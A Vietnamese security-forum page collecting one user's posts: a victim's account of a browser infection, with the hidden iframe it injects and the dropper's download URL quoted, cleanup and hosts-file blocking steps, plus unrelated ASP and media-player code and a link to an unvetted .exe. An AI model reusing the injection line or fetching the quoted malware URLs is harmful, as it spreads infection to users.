banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: beham10  XML
Profile for beham10 Messages posted by beham10 [ number of posts not being displayed on this page: 0 ]
 
Báo cáo với ai nếu bị giống em: cách giải quyết rất đơn giản.
Bước 1: Cài Antivirus (Nếu chưa cài). Em cài kasperskey internet security.
Bước 2: Khởi động vào SAFE MODE.
Bước 3: Quét thư mục Windows, và Documents And Setttings, Program Files\Internet Explorer, Program Files\Mozila Firefox (Không cần quét full đâu - mất thời gian ^ ^ - nhưng nếu thích thì cứ quét ^ ^)
Bước 4: Nhận thông báo phát hiện ra virus (detect), nhưng nó không xóa được - ??? - chả biết tại sao - dù đã chọn Action = Delete).
Bước 5: Delete các file = tay do nó phát hiện
(chú ý: thông thường là KAPS sẽ phát hiện ngay các file .exe trong Windows khoảng 27-28 Kb, trong thư mục IE thì có thể có file NewTemp.dll)
Other: Chả biết có động chạm gì không nhưng em Disable "Services: Task Scheduler" roài
------------------------------
File exe gốc nó đã tải về máy và đổi tên move rải rác trong Windows có cội nguồn là từ http://down.851733.cn/down1.exe
Con này là của Chinese.
Dùng FindWindow, ShowWindow
Em vẫn sống chung cùng con "gì gì" đó các bác ạ. Tại bản gost của em - em delete mất roài, với lại ko mún cài lại máy. Sau khi Hijack hai ziếc ko ăn thua, em đã nghĩ ra 1 cách ^ ^. Giờ em sống chung với nó ngon lành smilie). Công nhận em thông minh phết. KE ke

Method:
In folder:
@Windows\system32\drivers\etc
Choose file:
host
Edit this file: (thêm và cuối)
127.0.0.1 aaa.369678.cn
127.0.0.1 www.aaa.369678.cn
(Các dòng có dấu # chỉ là comment)
smilie smilie smilie
FireFox cũng bị. Hic lẽ nào em lại phải Format máy.
Em không bít bị trojan hay spyware gì mà bi giờ, mỗi lần em truy cập 1 web site, nó cứ thêm cái này vào lúc load(em xem mã nguồn):
<iframe src='http://aaa.369678.cn/ppp.htm' width=0 height=0></iframe>
Hu hu, làm mạng em đã chậm lại chậm hơn. Bác nào cứu em. Em quét full = Symantec, nó tìm thấy 2 con: Trojan.Exploit.131; W32.Fubalca.N!html đều ở trong Temporary Internet Files. Nhưng vẫn bị. Hu hu
Nhìn thấy ổ đĩa D thế kia thì có mà chạy cái ằng ặc.
Giả sử host bạn up lên là: http://gigido.com/
File ASP mà bạn dùng truy cập data: http://gigido.com/yoursite.asp
File data nằm ở: http://gigido.com/gaiviet/DB/gaiviet.mdb
Thế thì:
conn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & server.MapPath("gaiviet/DB/gaiviet.mdb") & ";"
Troài ơi! nhac số thì viết code lấy link dễ ợt. Bi giờ ai biểu em cách lây nhạc ở: http://music.vuilen.com với. Nó liên quan tới Action Script (dùng file SWF chơi nhạc, link định dạng rtsp). Pác nào ra tay đê.
Còn đây là chương trình lấy link nhạc số + youtube + video.google + clip.vn của em. Mời các bác xơi tạm cho thay đổi không khí http://congaaiti.googlepages.com/GetLink.exe
Xem thử rùi nhưng chưa biết cách bỏ!
Hỏi ý không phải, trong code đã có: autostart = '1' nghĩa là tự động chơi nhạc. Vậy bạn cần chi phải click để nó Play. Không biết bạn dùng nó sao chứ, tui thử thì thấy chạy bình thường mà, cả trên IE lẫn FireFox nhé:
Code nè:
<script language = javascript>
function CreatePlayer(strSource)
{
var s;
s="<object id='mediaPlayer' classid='CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95' codebase='http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701' width='345' height='280' standby='Loading Microsoft Windows Media Player components...' type='application/x-oleobject'>";
s+="<PARAM NAME='filename' VALUE='"+strSource+"'> ";
s+="<PARAM NAME='autostart' VALUE='true'> ";
s+="<PARAM NAME='animationatStart' VALUE='true'> ";
s+="<PARAM NAME='showcontrols' VALUE='true'> ";
s+="<PARAM NAME='showstatusbar' VALUE='true'> ";
s+="<PARAM NAME='autorewind' VALUE='1'> ";
s+="<PARAM NAME='volume' VALUE='50'> ";
s+="<PARAM NAME='playcount' VALUE='1'> ";
s+="<PARAM NAME='uimode' VALUE='full'> ";
s+="<PARAM NAME='enableContextMenu' VALUE='0'>";
s+="<embed type='application/x-mplayer2' id='mediaPlayer' name='mediaPlayer' src='"+strSource+"' animationatStart='0' uiMode='full' autostart='1' enableContextMenu='0' showstatusbar='true' width='345' height='280'></embed> ";
s+="</object>";

document.getElementById("MBMEDIAPLAYER").innerHTML=s;
}
</script>
<body>
<div id = "MBMEDIAPLAYER">
</div>
<script language = javascript>
CreatePlayer ("mms://210.245.24.10/Music/NhacTruTinh/CamLy_MuaMuaDiQua/wma/06_CamLy_AnNan_HoangTrang.wma");
</script>
</body>
Thăn cưu
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|